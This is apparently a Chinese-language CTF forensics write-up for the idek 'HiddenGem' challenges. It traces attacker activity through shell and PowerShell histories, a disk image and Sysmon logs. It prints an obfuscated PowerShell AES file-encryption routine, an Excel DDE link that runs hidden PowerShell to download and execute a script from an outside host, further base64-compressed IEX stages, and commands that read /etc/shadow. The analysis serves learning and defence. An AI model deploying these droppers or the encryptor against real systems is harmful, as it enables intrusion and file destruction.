[email protected]!terminal
cd Docu[TAB]
ls
rm -rf Confidential.pdf[TAB]
exit
得到压缩包密码:[email protected]! 解压后,得到压缩包里的pdf
拿到url:https://pastebin.com/VtwugbAi,访问拿到flag -> idek{[email protected]_0f_K3yb04rd_d4tA}
通过\home\kalilinux\.zsh_history
拿到历史记录
cd ~
cd Desktop
ls
clear
cd ../../../../../../../../
cd /var/log
cd ~
sudo apt install curl
curl https://pastebin.com/raw/awhuFZse -0 tienbip.txt
LESSCLOSE=/usr/bin/lesspipe %s %s
cd -
cd Desktop
ls
gpg --quick-gen-key Cocainit
gpg --quick-gen-key VNvodich
gpg --quick-gen-key Siuuuuuu
ls
gpg -er VNvodich RestrictedAccess.pdf
ls
rm -rf RestrictedAccess.pdf
cat /etc/shadow | grep idek{
cat /etc/shadow | grep "idek{"
mv RestrictedAccess.pdf.gpg $(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 5 | head -n 1)
pwsh
ls
mv T3C4U.SOS recycle.bin
reboot
然后在\home\kalilinux\Desktop\recycle.bin
发现recycle.bin
然后其也就是T3C4U.SOS
继续搜索发现存在powershell日志\home\kalilinux\.local\share\powershell\PSReadLine\ConsoleHost_history.txt
内容为:
ls
whoami
( nEw-oBJECT syStem.io.sTrEamReadeR( ( nEw-oBJECT sysTeM.iO.COMPReSsioN.deflAtEsTREaM([sySTEM.iO.MeMoRyStreaM] [ConVert]::froMbaSe64striNg('hVXbbuJIEH2PlH/omZfYGrAwtxCkPASWXLTDgGL2Mot46MENeGLaqN3WLov873uqbQPGiRZhulz3OlXVBKM/mWVZnw/tRnpw79JDs5Me2l3QOF0XNJ4mydqge+mh1cJ5i5Me6DQhAkVakLjQwLcNAXy1yB9em2QLaYto2HVIk94Rpw0dF2eLYkDWBN2ENxeOwepQCumBEqI3eqALWQvcDs42niY9FA+vYN+mn+srdsPyT3p9dX1VvHyfjoVcqv1OR4rd0ysX8ZjLm9oNXwsfrG/i7/rkx0+x1Mzbx1psHU8sExXovTM0dmvFd1BnJeNDKUS84WCTQ+eXIN5FsbBsKEBPGaKSjPAHey3iLKNjgs5McRmvIrV9DCQPYZ7rlVxkOVSCXXxOnGDFLJhNud7Y7CxvSm8QRss3ku5CHkgTq8YaNVbiOF+FXMP4ohCYn0ID9JTK5bsNcAt2G6HGkS8W/f5wMLw2lThT7vuBXKPo+cdIwzzXy+3/gnEVsxMIEG+zHCyQ/f6r4P5DGBpdquwxCIXzmIThN74VF0BBHCWakMm8lnTZF/ZTThxv4uG4vqJyR5M3+/+xptlScKCF8oQ2ru7JlSmSQoC2FyejuacV6l3kTcoEdjHFA7EOJHtv3gze+BnjKecExvsAQ2AVoeeTRO8S4sCXzzF/+wwFrRJRY1Oa+VOrXiYOpb6gVpYRUEInSlKBpMCOE850VAAMI/+jGaY2mzgEcME0c+kF/wowtVk+9gfqEPWRUljk+ljEMRSPQWWk2SpKpP/J9OqyQT+U4G9ldlqZhNPAU8AsaJEttVRvSr7T4+AXnRpJn8zMOGWJPix1EEnmIUWpw/0wkjqQyQV+NDOfKoOKjsMXtuGhgCrL6LIf/b4B5oHQIz7Os+HPp7tWvXqOYwyDZqebA3/GfO/GyOAwiN+zJygVK+s9UwLNnlkToSJzY4FcJTKDYJQFJzJ3OB9u/VDoQSBp2aF7thDTYn/APi3mVx5rU+ws2GbD6R679N7FeL4WZ2KwZ/udsOZxtnbFPkxpl8oL88G/BNWo6y+Am9VNt7/ThDsvv+PKOAGdG8OT4FrkAETHjK2nwsepT3apRsE+Ku9XsaflQF5o3dkcmjJUtMR2XNwYZeNsz8/+tYbRdpdo8czjjVVM2Ez8ox2kHVF/MGe/zR57DpLOhgtX4eVM3di2o8Q05EthWfPlM39ddO++ZMRtQbiNW7s292avL/JpkbFadxU7t9Et9N3G0UXFsF0x7BVxekezaryuzez/AA==' ), [SyStem.IO.comPreSSION.cOmpreSSIONModE]::DEcOmPREsS ) ), [text.ENcodiNg]::AScII)).ReAdToend()|&( $sHeLLid[1]+$shELliD[13]+'x')
Encryption -Path ./T3C4U
Remove-Item -Path ./T3C4U -Force -Recurse
exit
解中间部分的powershell代码可以得到
iEX ((("{40}{19}{25}{46}{15}{11}{41}{20}{14}{48}{33}{47}{37}{35}{2}{1}{31}{23}{18}{8}{45}{9}{39}{28}{24}{43}{38}{27}{53}{13}{36}{49}{16}{30}{17}{26}{21}{12}{0}{51}{4}{6}{10}{50}{5}{32}{34}{52}{42}{22}{29}{3}{44}{7}"-f ' } YPMencryptor = YPMaesMan','aged = New-Object System.Security.Cryptograp',' YPMaesMan','{
YPMshaManaged.Dispose()
','r()
YPMencryptedBytes = YPMencryptor.TransformFinal','edBytes
YPMaesManaged.Dispose()
if (YPMPath) {
','Block(YPMplainBytes, 0, YPMplainBytes.Length)
YPMen','se()
}
','ed.Padding = [System.Security.Cryptography.PaddingMode]::Z','cryptedBytes = YPMaesManaged','m
(','::ReadAllBytes(YPMFile.FullName)
YPMoutPath = YPMFile.FullName + jnO.SOSjnO
','sEOk))
if (Y','arameterSetName = jnOCryptFilejnO)]
[String]YPMPath
)
Begin {
YPMshaMan','ra','M','
','ystem.Security.Cryptog','()]
[Outpu','(Mandatory = YPMtrue, P',' = [System.IO.File]','e
return jnOFile encrypted to YPMoutP','d
YPMaesManaged.Mode = [S','sManaged.BlockSize','t',' Write-Error -Message jnOFile not found!jnO
break
}
YPMplainBytes',' ',' YPMae','athjnO
}
}
End ','Path -ErrorAction SilentlyContinue
','hy.AesManage',' [System.IO.File]::WriteA','stem.','llBytes(YPMoutPath, YPMencryptedBytes)
','256Managed
','PMPath) {
YPMFile = G','ography.SHA','28
','eros
','function Encryption {
[CmdletBinding','
[Parameter','= YPMFile.LastWriteTim',' = 1',' YPMaesManaged.Dispo','
YPMaesManag','Type([string])]
Pa','Security.Crypt','aged = New-Object Sy','et-Item -Path YP','.IV + YPMencrypt','aged.CreateEncrypto',' (Get-Item YPMoutPath).LastWriteTime ',' YPMaesManaged.KeySize = 256
}
Process {
YPMaesManaged.Key = YPMshaManaged.ComputeHash([System.Text.Encoding]::UTF8.GetBytes(EOkYPMencryptedByte')).rePlace(([cHaR]69+[cHaR]79+[cHaR]107),[STRInG][cHaR]39).rePlace(([cHaR]106+[cHaR]110+[cHaR]79),[STRInG][cHaR]34).rePlace(([cHaR]89+[cHaR]80+[cHaR]77),[STRInG][cHaR]36) )
再解一层格式化后可以拿到:
function Encryption{
[CmdletBinding()]
[OutputType([string])]
Param(
[Parameter(Mandatory = $true, ParameterSetName = "CryptFile")]
[String]$Path
)
Begin {
$shaManaged = New-Object System.Security.Cryptography.SHA256Managed
$aesManaged = New-Object System.Security.Cryptography.AesManaged
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
$aesManaged.BlockSize = 128
$aesManaged.KeySize = 256
}
Process {
$aesManaged.Key = $shaManaged.ComputeHash([System.Text.Encoding]::UTF8.GetBytes('$encryptedBytes'))
if ($Path) {
$File = Get-Item -Path $Path -ErrorAction SilentlyContinue
if (!$File.FullName) {
Write-Error -Message "File not found!"
break
}
$plainBytes = [System.IO.File]::ReadAllBytes($File.FullName)
$outPath = $File.FullName + ".SOS"
}
$encryptor = $aesManaged.CreateEncryptor()
$encryptedBytes = $encryptor.TransformFinalBlock($plainBytes, 0, $plainBytes.Length)
$encryptedBytes = $aesManaged.IV + $encryptedBytes
$aesManaged.Dispose()
if ($Path) {
[System.IO.File]::WriteAllBytes($outPath, $encryptedBytes)
(Get-Item $outPath).LastWriteTime = $File.LastWriteTime
return "File encrypted to $outPath"
}
}
End {
$shaManaged.Dispose()
$aesManaged.Dispose()
}
}
根据解密的办法解密SOS文件,解密后的文件即为T3C4U
,file一下是PGP RSA encrypted session key - keyid: 6FCC942C DC8258E7 RSA (Encrypt or Sign) 3072b
然后通过上面的mv RestrictedAccess.pdf.gpg $(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 5 | head -n 1)
可以得知T3C4U
是RestrictedAccess.pdf.gpg
下一步是需要寻找秘钥:
这里将\home\kalilinux\.gnupg
下的文件夹覆盖本地的.gnupg即可解密
~/Desktop/2layer/home/kalilinux$ cp -r .gnupg /home/{username}/
~/Desktop/2layer/home/kalilinux$ gpg --list-key
/home/{username}/.gnupg/pubring.kbx
---------------------------------
pub rsa3072 2023-01-13 [SC] [expires: 2025-01-12]
B719E23BEED6B02C76494DB43AE26A2802699708
uid [ultimate] Cocainit
sub rsa3072 2023-01-13 [E]pub rsa3072 2023-01-13 [SC] [expires: 2025-01-12]
5295D629A12B0703063559ED1E9F58A43C01EDBB
uid [ultimate] VNvodich
sub rsa3072 2023-01-13 [E]
pub rsa3072 2023-01-13 [SC] [expires: 2025-01-12]
BD3EF2F8AFFDCC3A933E33E756EEDD86FA3AEBB6
uid [ultimate] Siuuuuuu
sub rsa3072 2023-01-13 [E]
:~/Desktop/2layer/home/kalilinux$ gpg --decrypt T3C4U > RestrictedAccess.pdf
gpg: encrypted with 3072-bit RSA key, ID 2C94CC6FE75882DC, created 2023-01-13
"VNvodich"
gpg: [don't know]: invalid packet (ctb=00)
gpg: [don't know]: invalid packet (ctb=00)
PDF为:
拿到flag --> idek{Cr34t1n9_ch4ll3ngEs_6_d4ys_6_n1gts_w1th0ut_sl33p}
下载文件后我们拿到了三个文件2023-01-07T194857_HiddenGem.zip
,Note.txt
,HiddenGem.7z
2023-01-07T194857_HiddenGem.zip
解压后是 2023-01-07T194857_HiddenGem.vhdx
Note.txt:
Note 1: All flags are wrapped in idek{} format, you don't need to do it yourself.
Note 2: The zip file is the same for all Mixtape. HiddenGem.pcapng is mainly for `HiddenGem Mixtape 3: The Ultimate Goal` however it may contain data for the rest of HiddenGem Mixtape.
Note 3: Password for HiddenGem.pcapng will be released with Mixtape2 and 3
HiddenGem.7z
需要密码,里面是流量包.密码是94cjFEJdMrZ&YI)s94cjFEJdMrZ&YI)s
file一下2023-01-07T194857_HiddenGem.vhdx
发现是:
2023-01-07T194857_HiddenGem.vhdx: Microsoft Disk Image eXtended, by .NET DiscUtils, sequence 0xe, NO Log Signature; region, 2 entries, id Metadata, at 0x200000, Required 1, id BAT, at 0x300000, Required 1
首先发现拿到的vhdx,不过似乎是由于其修改了部分偏移或者是抹去了一些信息,导致autopsy的直接分析失败,所以采用先Diskgeniu打开磁盘文件,然后恢复的方式将文件系统恢复出来,再采取Autopsy的logicfiles以进行解析,大概效果如下图:
由于题目描述中提到了Initial Access
可以联想到可能存在某些初始植入物,同时autopsy的分析标明存在邮件信息
提取之后发现邮件信息如下,附带的Policy.7z和密码[email protected]!!!
另存为7z后用密码解压可得到Policy.xlsx,继续对xlsx文件进行分析
解压后可以观察到其存在一些xlsx,在检查了不存在模板注入,CVE的情况下可以参考是否存在DDE.
在xl\externalLinks\externalLink1.xml
存在
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<externalLink xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14" xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main"><ddeLink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ddeService="cmd" ddeTopic="/c powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString(\"http://172.21.20.96/windowsupdate.ps1\");IEX $e"><ddeItems><ddeItem name="_xlbgnm.A1" advise="1"/><ddeItem name="StdDocumentName" ole="1" advise="1"/></ddeItems></ddeLink></externalLink>
具体可以知道这里执行了命令cmd /c powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString(\"http://172.21.20.96/windowsupdate.ps1\");IEX $e
相关的命令是powershell隐藏运行从http://172.21.20.96/windowsupdate.ps1
获取内容并且执行
当然你也可以通过选择一些在线沙盒的方式来运行进而拿到参数
类似于any.run:https://app.any.run/tasks/227c2a3f-8be3-443a-9a55-b4f5e8406e17
通过上文中我们找到的线索http://172.21.20.96/windowsupdate.ps1
,但是这是个私有ip没法访问,然后将其放在autopsy进行搜索后,发现后续的阶段存在一些日志的信息中
其日志文件都位于:C:/Windows/System32/winevt/logs/
下提取Microsoft-Windows-Sysmon%4Operational.evtx
日志并且使用Event Log Explorer
加载
可以拿到后续的payload-->windowsupdate.ps1
& ( $sHEllid[1]+$sheLLiD[13]+'X')( NEW-obJEct Io.cOMPReSSiON.DEFlAteStrEAM( [SyStem.iO.mEMOrySTream] [SysteM.cOnVerT]::FRomBase64STRINg( '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' ) , [sySteM.IO.ComprESsiON.cOmpresSiONMODe]::dEcomPrEss)|fOReach-OBJECt{NEW-obJEct iO.sTReAMrEAder( $_ , [TExT.EncOdiNg]::AscIi)} | fOREacH-obJeCt{$_.reADToend()})
该payload可以观察,根据powershell恶意样本的分析经验,我们可以得到& ( $sHEllid[1]+$sheLLiD[13]+'X')
代表iex 所以我们只需要将其变成echo
后再跑即可得到下一阶段
(New-OBJECT MAnAGeMent.AUtOmaTiON.PsCreDEntIAL ' ', ('76492d1116743f0423413b160
50a5345MgB8AHUAQgAxAEsAZQBQAE8AUQA4AHQAVAB5ADEAcwBXAFYALwBVADcAUAAyAGcAPQA9AHwA
MQAzADcAMwAwAGIAOQA2ADMANQAwAGYAOABlADUAOQAxAGEAMgA4ADAAOQAzAGQAMABjADYAZgA2ADQ
AOAAxAGYAZAA4AGUAMAA2ADIANABmADQAMgAzADMAYwAxAGQANgA4ADEANgAwADcANgA1AGYANgBjAG
UAZQA1ADAAMwA4ADMAZQA5AGMAOQAzAGUAYgBhAGIANgA1ADEANQBjAGYAYwBiADIAOQA2ADcAYgA4A
GEAZAA3AGYANABhAGYAYgA2ADgANQAyADkAOAA1ADUAYQA2ADkAMwAzADMANwBkADIAOQA1ADkAZgBh
ADkANAA1AGYANwA1ADIAZAA2AGMAMgBhADYANQBjADAAYwA4AGEAYQA0AGYAZQBiAGUAYgA2AGQAOQA
4AGIAOAA1AGYAZAA1ADMANgBkADYANQBkADMAZQBiADAANQBjADkAMABmADMANQA0AGYAOQBiADMAMQ
A2ADkAOQAyADcAZgA2ADcAZgBiADAAYQAxAGYANAAzAGIAYQBjADQANwA2ADgAYwA4ADYAOAA2ADcAY
wA2ADAAZABkADkAOQAwADAAYgAzADYAMgA2ADUAZQA0AGYANAA2AGEAYgAwAGMAOAAwADAANQA4ADkA
NQBlAGYAYwBhADkANAAwADEANgBkADgAMwAzAGEAYQBlADMAMgAxAGEAMQBiADAAMwAwADQANQA1ADQ
AYQAzADIAYwA4AGQAZQBkADUAZABlAGIAMwA2ADgAYgA4AGYANAAyADUAZAAxADIAOAA0AGYANwA2AD
cAMABjADMAOAA1ADMAMwAyADkAZQA2AGEANwBmADAAZAA2ADUAMwBkADkAYgAzADcAMgA4ADEAZAA2A
GIANwAwADUAYwA0ADMAYQAwAGUAZgA0ADYAZQBiADkAYgA5ADcANQA5ADkAYQA0ADEAMgBhADQAYQA4
ADYAMQBhADIAYgA4ADcANwAzADIAMABjADIAMQA3ADgAYwA0ADIAYwA0ADYAZgAwAGIANQBmAGEAYQA
3AGIANQBlADMANgAwAGEANwAwAGMAMgBlADgAYQA5ADAAYwBlADkAMgBjADgAMgA3ADIAMAA4ADMANw
BiAGQANAA1AGYAOQBlADQANABkADkAMgBiADAAZQBiADgAYgA4ADQAZQA2AGQANgBlADAAYgA5ADcAN
QBhAGQAYQA2ADMAZgAwADcAMAA3ADcAYgA5AGYAYwAxADcANQBjADUANgAwAGMAZQA4ADYAZAA4ADkA
ZABhADgAOQA1AGQAMQA5AGEAMQAzADUANgAxADUAMAAyAGQANgA2AGMAZQBmAGQAYwBlADUAMABiADA
AYQA5ADIAOABlADMAZABkAGUANAAzADIAZgAwAGEANgA3ADkANQA3ADYANgA3ADIAOQBjAGUANgBkAD
QAZAAwAGUAZAAwADgAZAA5ADQANgBlADYAMwAyADIANQAyADkANABmADgAYwA5ADkAMAA0AGQAZgBkA
DEAYwAxAGUAOQAxADcAZgAyAGMANQBkAGYAMwAzADMANgBlAGEAZgBmAGMANgBjAGMAZABkAGQAMAA5
ADAAZQAzADQAZAAwADYAZAAyADUAMwA2AGMANgA2ADAANAAyADUANgA2ADUAYwA0ADQAZQAyADIAMgB
mADAANQAyAGEAYwA5ADAAZAAzADYAZAAzAGYAYQA2AGEAOAA0ADIAOQAwADAAMQAwAGYAOQBhADAAMw
BkAGYAMQBiAGMANgAwAGMAZAA4ADEANAA5AGEAMwAyAGQAOQBlADcANwBkADEAYQBiADUANQA0ADIAZ
ABhADQANwBmADAAYQA2ADYAMAAyADEANABmADAAMgAyAGEAMQAxAGQANgBjADgAOQA2ADYAYgA1AGQA
NQAwADIAMwBiADQANwAxADkAZgA5AGIANAA4AGQAYwAwADAANABiADIANgA2ADEAMwAwADIAYQA1ADI
AOQA2ADgAOQBmADgANgAwAGUAYwAyAGUANwAyAGUANAA1AGEAZABhAGEAMgA5ADQAZQAxAGUAMgA0AD
cAMQAzAGYANAAyADMAYQAzAGMAZgBlAGEANQA0ADQAYQBmADEAZAA1AGYANQBiADQANQA2ADgAZQBhA
GYAZQA4ADYAYgBhADgAMgBjADAAZQBjADIAMQAyADQAMgAyADAANAA4ADAAMAAyAGIAMgBiAGQANwBj
AGYAYQA3ADIAMABhAGMANgA1AGYAZgA4ADcAZQA2ADcANwA5AGQAMAA2AGEANgBlADkAZgA1AGIAOQA
0AGEAMwBiADAANgA4ADMAZAAwADQANQBkAGIAYwBmAGEANwBiADkAMAA1ADgAMABiAGYAYgA1AGEAMg
AxAGUAMQA0ADgANgAzADgAYQAwADcANQBlADUAYgA5AGUAYgAxADQANQA2AGQAYgAzADEAZgA0AGQAZ
QBiADMAZABlADIANQBiAGYANgA5AGUANQA5ADYAYgA4AGEAMgBjADcAYgA5ADUAOAAxAGMAZQAwADcA
ZAAzADQAMwA0ADIAMwA5ADMAYQAyADUAMQBkADUAYgBlADQANABmADgAMgBiADYAMgA3ADgAYgAxAGM
AMQBhAGMANQAyAGQANgBlADcANAA1AGYANAA5ADMAMAA5ADcANwBkAGIAMwA0AGUAYQBjADEANwAwAG
UAZQBhADEAZQAzADUAZAA0ADIAYQBjADAAMQA2ADYAOABlADQAMAAxADcANwA4AGUAZABjADgAZAA5A
GIAZQA0ADcANgBmADAANwBiADgAOAA4ADIAYgA4AGIAYwA2ADgAZQA3ADgAYQA2AGQAMwAzAGMAZQBl
AGUANQAzADIAZQBkAGMAYQBhADkANwBhAGEAOAAwADEAZgA0ADEAMwAxADAAYwA2AGEAZgBmAGMAZgB
lADEAYQA5ADcAOAAxADEAOQAwADEAYwBkADIAOQAwAGYANgBhADkAYwBlAGQAYQBmADYAYwBmADYAOA
A1ADMAMAAxADQANgA2ADUAZABhADMAYgAwADEAZQAwADgAMwAxADMAMgA5ADYAOQA1AGYANAAwADgAO
ABjAGYANABmAGEAMgAxADQAZQA3ADUAMgA2ADQAOABhAGMAYgBlADAAYgA2ADcAYwAyAGMAOQA0AGIA
MwBlAGIANAAxADkAMwAyAGIAZQBhADMANQA4AGUAOQBkAGQANQA3AGUAYgAyADcAZABmADQAZQBiADQ
AOQBmADQAMAA5AGEAOABhADYAOABhAGIAZQBlADAAYQA2ADUAZgA3ADEANQBkADIANABiADcAYwAxAG
IANQAwADgAZQBlAGUAMQBjAGEANAA1ADYAMgBiAGYAMwA4ADAAMwBiADIAZgAwADAAYQAxADEAOAAwA
DQAYgA3ADcAMwBhADEANABkAGQANQA1ADQAZgA1AGMAMAA5ADQAOQA0ADAAZgA3AGIAMwA3AGIAMwAx
ADAAZQBjADQAYQA3ADYAMQBkADQAOQA3AGEAOABiAGYAZgBhAGMAZQAyADAAMgA3ADIAOQAxADIAZgB
hADQAYwBhADkAYwA4ADAANwA0ADUANwAyADgAZQAzADUAMQBlADIAMgA1ADYAMAAwADAAOAAyAGIAYQ
A4AGYAZQBiAGEAMAA3AGYAMgBjAGIANgBkAGMAZgAxAGIAYgA4ADEAMgA4ADAANQA3ADMANAA3ADcAO
QA5AGUANQA2ADUAMQAwAGQANAA1AGYANQAyAGQAYwBiADUAZgAzADgAMABmADIANwAxAGMAZQBhAGYA
OABiADUANQBiAGQAZgBkAGMAMABjAGIANwBjADAANAA5AGYAZABkADAAMgAwADAAYwA5ADcAYwA3ADQ
ANwBkADQAYgAwAGYAZABkAGYAMwAzADUAZQAwADgAZAAyADIAYQA4ADQAOQBlADgAZgBjAGMAMgAzAD
cANAAyADcAZgBhADMAZgA4ADUAMgBhADAANQAxADkAYgAyAGQAYwBjADQAOQA1ADUANwAwADUAYgA0A
DgAOQBkADEAYwAzADgAMAA3ADUAOAA5AGEAYQBiADYAZQA5ADEAYQAxADMAMgBkADYAZAA5ADYAMQAz
AGQAZAA2AGYANQAyAGQANgA1ADIAMAA5ADUAYgA2AGEAZQBjADkAMQBhAGIANQAyADUAMwA5ADQAMAA
yADUAOQA0ADgAZgBmADgANAAwADYAMwBmAGIAMAA4AGQAZgA0ADUAYwAyAGQAOQAwADYANgA5ADkAOA
BiAGYANAA1ADYAMQAyADUANQA1ADAAYwAzADUAYgAwAGQAMgA0ADUAZAA0AGUAYwAyAGYAMABkADAAO
AA1ADgAYgA0ADcANAA1ADIAMAAwADIANwBlADYAYgA2ADUAOABlADMAYgA3ADYAYgBmAGQANQA2ADYA
ZAAyADYAYwA4ADcANQAzADcAOABjAGMAMQBlADQANABmAGUAOQBhADUAYQBlADkAZABkAGMANQA2ADA
AMQBmADYAMAAxADEAOQA3AGIAYwBiAGUANwA2ADIAZAA4ADkAYQA4AGEAMgBlAGQAMgA4ADQANAA4AD
cANAA4AGEAYgA0AGIAMgA5ADgAOQBhAGUAMQAzADUAMwBkADMAMAA5ADMANQA1ADMAMQAyADEAYQBhA
DkAOAA2ADgAOQBlAGEANwA2ADIANAA3ADgAOQAzAGEAYwA0ADkAYgBhAGMAMwBmAGQAZABiADYAZgA3
ADAAZABkADIAMQA3ADAAYQA4ADQAOQBlADYANgAxADkAYQA3ADMAMgA0ADgAOQA2ADcAOQBkADEAYQB
